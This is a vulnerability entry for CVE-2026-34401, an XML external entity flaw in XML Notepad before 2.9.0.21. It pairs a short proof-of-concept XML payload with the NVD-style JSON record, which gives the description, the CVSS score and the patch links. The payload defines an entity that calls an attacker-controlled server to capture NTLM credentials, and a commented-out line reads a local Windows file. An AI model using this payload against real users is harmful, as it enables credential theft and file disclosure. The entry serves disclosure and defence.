CVE-2026-34401

<!-- PoC for CVE-2026-34401: XXE leading to OOB/File Read --> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!-- Example 1: Triggering an outbound HTTP/SMB request (e.g., for NTLM capture) --> <!ENTITY xxe SYSTEM "http://attacker-controlled-server.com/capture" > <!-- Example 2: Reading a local file (if supported by parser config) --> <!-- <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" > --> ]> <foo>&xxe;</foo>

{"cve": {"id": "CVE-2026-34401", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:18.490", "lastModified": "2026-04-13T15:19:47.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XML Notepad is a Windows program that provides a simple intuitive User Interface for browsing and editing XML documents. Prior to version 2.9.0.21, XML Notepad does not disable DTD processing by default which means external entities are resolved automatically. There is a well known attack related to malicious DTD files where an attacker to craft a malicious XML file that loads a DTD that causes XML Notepad to make outbound HTTP/SMB requests, potentially leaking local file contents or capturing the victim's NTLM credentials. This issue has been patched in version 2.9.0.21."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:xml_notepad:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.9.0.21", "matchCriteriaId": "F08C7164-A566-4527-8764-F9BC54E164F1"}]}]}], "references": [{"url": "https://github.com/microsoft/XmlNotepad/commit/3665603d61ba10b7827a3724e854748cb780140c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/microsoft/XmlNotepad/commit/c03ab2311ac6960452eb1ab49098768f851dcc53", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/microsoft/XmlNotepad/releases/tag/2.9.0.21", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/microsoft/XmlNotepad/security/advisories/GHSA-5j32-486h-42ch", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/microsoft/XmlNotepad/security/advisories/GHSA-5j32-486h-42ch", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Mitigation", "Vendor Advisory"]}]}}